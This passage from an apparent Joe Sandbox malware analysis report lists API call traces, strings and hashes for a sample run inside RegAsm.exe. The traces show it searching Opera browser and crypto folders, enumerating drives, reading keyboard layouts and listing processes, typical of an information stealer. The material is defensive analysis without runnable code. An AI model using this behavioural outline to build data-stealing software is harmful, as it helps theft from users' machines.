                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99514AB2900118ABCF20EBA1ED49AEE777DBF49314F0004AAF515E2191E7389759CFA4
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00409E06
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00423BDE,00000000,?,00000000), ref: 00409E85
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00423E1C), ref: 00409EDF
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00423E20), ref: 00409EF9
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,Opera,00423BEB,00423BEA,00423BE7,00423BE6,00423BE3,00423BE2,00423BDF), ref: 00409F8C
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 00409FA0
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 00409FB4
                                                                                                                                                                                                                                                                • Part of subcall function 004010D8: _EH_prolog.MSVCRT ref: 004010DD
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                                                              • String ID: 7$Opera$Opera Crypto$Opera GX$\*.*
                                                                                                                                                                                                                                                              • API String ID: 3869166975-536343317
                                                                                                                                                                                                                                                              • Opcode ID: 905816fbe52db63812e793a7664f03e12c33f574c9ab0a675d8857fd4fc45b5f
                                                                                                                                                                                                                                                              • Instruction ID: 4ee464abe0630bd3f6ef2111930aa846f06f59d421dc7013a9b3c8e3e60c6303
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 905816fbe52db63812e793a7664f03e12c33f574c9ab0a675d8857fd4fc45b5f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1942923190128CEACF05EBA6C955BDCBFB46F19308F5444AEE805732C2DB781B18CB66
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,-00000003,04000102,00000000), ref: 19834EE1
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                                                              • String ID: YHI;$delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
                                                                                                                                                                                                                                                              • API String ID: 823142352-2169725648
                                                                                                                                                                                                                                                              • Opcode ID: 2cf8cfc84cda5c85f2883e1b4af1562e645fefd222ac2438fc35402dc5ddcbc0
                                                                                                                                                                                                                                                              • Instruction ID: 1bb3bbbc911a85c5f196950be838c7acd03eebb6570062e4bb551b6d47777c18
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2cf8cfc84cda5c85f2883e1b4af1562e645fefd222ac2438fc35402dc5ddcbc0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B8F1CBB1A043519FDB148F3CC885B1A77E8BB94746F88492DF84AC72C1D735DA89CB92
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00414342
                                                                                                                                                                                                                                                              • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004143A4
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 004143C3
                                                                                                                                                                                                                                                              • GetDriveTypeA.KERNEL32(?), ref: 004143CC
                                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 004143EC
                                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 0041440A
                                                                                                                                                                                                                                                                • Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D
                                                                                                                                                                                                                                                                • Part of subcall function 00413F80: _EH_prolog.MSVCRT ref: 00413F85
                                                                                                                                                                                                                                                                • Part of subcall function 00413F80: wsprintfA.USER32 ref: 00413FAB
                                                                                                                                                                                                                                                                • Part of subcall function 00413F80: FindFirstFileA.KERNEL32(?,?), ref: 00413FC2
                                                                                                                                                                                                                                                                • Part of subcall function 00413F80: memset.MSVCRT ref: 00413FD9
                                                                                                                                                                                                                                                                • Part of subcall function 00413F80: memset.MSVCRT ref: 00413FE7
                                                                                                                                                                                                                                                                • Part of subcall function 00413F80: StrCmpCA.SHLWAPI(?,00424758), ref: 00414005
                                                                                                                                                                                                                                                                • Part of subcall function 00413F80: StrCmpCA.SHLWAPI(?,0042475C), ref: 0041401F
                                                                                                                                                                                                                                                                • Part of subcall function 00413F80: wsprintfA.USER32 ref: 00414043
                                                                                                                                                                                                                                                                • Part of subcall function 00413F80: StrCmpCA.SHLWAPI(?,0042446F), ref: 00414054
                                                                                                                                                                                                                                                                • Part of subcall function 00413F80: wsprintfA.USER32 ref: 0041407A
                                                                                                                                                                                                                                                                • Part of subcall function 00413F80: memset.MSVCRT ref: 004140A0
                                                                                                                                                                                                                                                                • Part of subcall function 00413F80: lstrcat.KERNEL32(?,?), ref: 004140B2
                                                                                                                                                                                                                                                                • Part of subcall function 00413F80: strtok_s.MSVCRT ref: 004140EB
                                                                                                                                                                                                                                                                • Part of subcall function 00413F80: memset.MSVCRT ref: 00414100
                                                                                                                                                                                                                                                                • Part of subcall function 00413F80: lstrcat.KERNEL32(?,?), ref: 00414115
                                                                                                                                                                                                                                                              • lstrcpy.KERNEL32(?,00000000), ref: 0041442D
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 00414492
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: memset$H_prologlstrcpywsprintf$Drivelstrcat$FileFindFirstLogicalStringsTypelstrlenstrtok_s
                                                                                                                                                                                                                                                              • String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
                                                                                                                                                                                                                                                              • API String ID: 2879972474-147700698
                                                                                                                                                                                                                                                              • Opcode ID: 9a0e78cfb2548f6f869585a3d980dec9b95ed49726ef5ca9c3736a71f5382786
                                                                                                                                                                                                                                                              • Instruction ID: 58c7e2158a2ed08aedab02b254e64c876912a71edb7371f0c145f83077c21ff0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a0e78cfb2548f6f869585a3d980dec9b95ed49726ef5ca9c3736a71f5382786
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F519571900148BBDF20EFA1DC85EEF3B6DEF45348F50082EB519A2192EB385B59CB55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 004011DE
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042037C,?,?,?,00420378,?,?,00000000,?,00000000), ref: 00401423
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00420380), ref: 00401441
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00420384), ref: 0040145B
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00420390,?,?,?,0042038C,?,?,?,00420388,?,?), ref: 00401587
                                                                                                                                                                                                                                                                • Part of subcall function 0040F7A3: SHGetFolderPathA.SHELL32(00000000,O<B,00000000,00000000,?), ref: 0040F7D4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2
                                                                                                                                                                                                                                                                • Part of subcall function 0040F5DE: _EH_prolog.MSVCRT ref: 0040F5E3
                                                                                                                                                                                                                                                                • Part of subcall function 0040F5DE: GetSystemTime.KERNEL32(?,00424398,00000000,00000001,00000000,004244BE,004244B3,004244B2,00000000,00000000), ref: 0040F623
                                                                                                                                                                                                                                                                • Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: _EH_prolog.MSVCRT ref: 0040613D
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406160
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406177
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406193
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 004061AD
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 004061CE
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?,?,?,?,?,?,00420394), ref: 0040185E
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,00420394), ref: 0040186D
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 00401BB5
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 00401BC6
                                                                                                                                                                                                                                                                • Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: _EH_prolog.MSVCRT ref: 00412F75
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: CreateThread.KERNEL32(00000000,00000000,00411D72,?,00000000,00000000), ref: 0041301B
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413023
                                                                                                                                                                                                                                                                • Part of subcall function 0040F75F: _EH_prolog.MSVCRT ref: 0040F764
                                                                                                                                                                                                                                                                • Part of subcall function 0040F75F: GetFileAttributesA.KERNEL32(00000000,?,0040D11E,?,?,?,?), ref: 0040F778
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 004061C3
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 00412FF9
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FileH_prolog$Find$lstrcpy$Close$CreateFirstLocalNextlstrcat$AllocAttributesFolderFreeHandleObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                                                                              • String ID: 5$\*.*
                                                                                                                                                                                                                                                              • API String ID: 40499504-3045658031
                                                                                                                                                                                                                                                              • Opcode ID: 6acfb0b8a330886f3c07ebc876d29f0257ca2d7e1a4ad477c629b61ccec8925a
                                                                                                                                                                                                                                                              • Instruction ID: 8fe853fa20658960ce76e94df6792b9ea689fe582a5c2dc8aed586a8de72a33b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6acfb0b8a330886f3c07ebc876d29f0257ca2d7e1a4ad477c629b61ccec8925a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B626F3180428CEADB05EBE6C955BDDBBB86F18308F5444AEF445732C2DB781B58CB26
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 0040E770
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                              • GetKeyboardLayoutList.USER32(00000000,00000000,004241B7,00000000,?,00000000), ref: 0040E7A2
                                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040E7B0
                                                                                                                                                                                                                                                              • GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040E7BB
                                                                                                                                                                                                                                                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040E7E5
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1
                                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 0040E889
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpy$H_prologKeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                                                                                                              • String ID: /
                                                                                                                                                                                                                                                              • API String ID: 2868853201-4001269591
                                                                                                                                                                                                                                                              • Opcode ID: 1a3b5d77612882ea5794f2b142a1218d0ae6da40df0d21af66489997f1f709a1
                                                                                                                                                                                                                                                              • Instruction ID: 5242bb83f7db48a209f353afb88fc463f83896732aa90f82399ba923e9b9454b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a3b5d77612882ea5794f2b142a1218d0ae6da40df0d21af66489997f1f709a1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A9312C72900118EEDB04EFE6D885AEEBBB8FF48304F14446EF505B3281C7785A95CBA5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 0040FC45
                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040FC6B
                                                                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,00000128), ref: 0040FC7B
                                                                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 0040FC8D
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,?,?,?,00000000), ref: 0040FCA1
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0040FCB4
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 186290926-0
                                                                                                                                                                                                                                                              • Opcode ID: 270f674b6bd053faef81da5913a7ace93250f6d8cd68a817cd281ad159d8f204
                                                                                                                                                                                                                                                              • Instruction ID: fa4158ad643b6a63ca4e836918e2f21684de1794b771a929b0a92a8893ecefeb
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 270f674b6bd053faef81da5913a7ace93250f6d8cd68a817cd281ad159d8f204
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B0019E71900418ABDB219F55EC49ADEBBBAFF81310F104076F801F2240D7788F45CBA9
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CoCreateInstance.OLE32(00424C98,00000000,00000001,00424388,00000000,?), ref: 0040F1C8
                                                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 0040F1D6
                                                                                                                                                                                                                                                              • _wtoi64.MSVCRT ref: 0040F218
                                                                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 0040F22D
                                                                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0040F230
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: String$Free$AllocCreateInstance_wtoi64
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1817501562-0
                                                                                                                                                                                                                                                              • Opcode ID: d4edb80c7c273018b9d901076822336c36bbc8e5ec39c678b9848d0cf7c73554
                                                                                                                                                                                                                                                              • Instruction ID: 36e1fe214f56445511a06ce0c9af4fa7ab1d6e2d6c38daba9a39b14b96fb5745
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4edb80c7c273018b9d901076822336c36bbc8e5ec39c678b9848d0cf7c73554
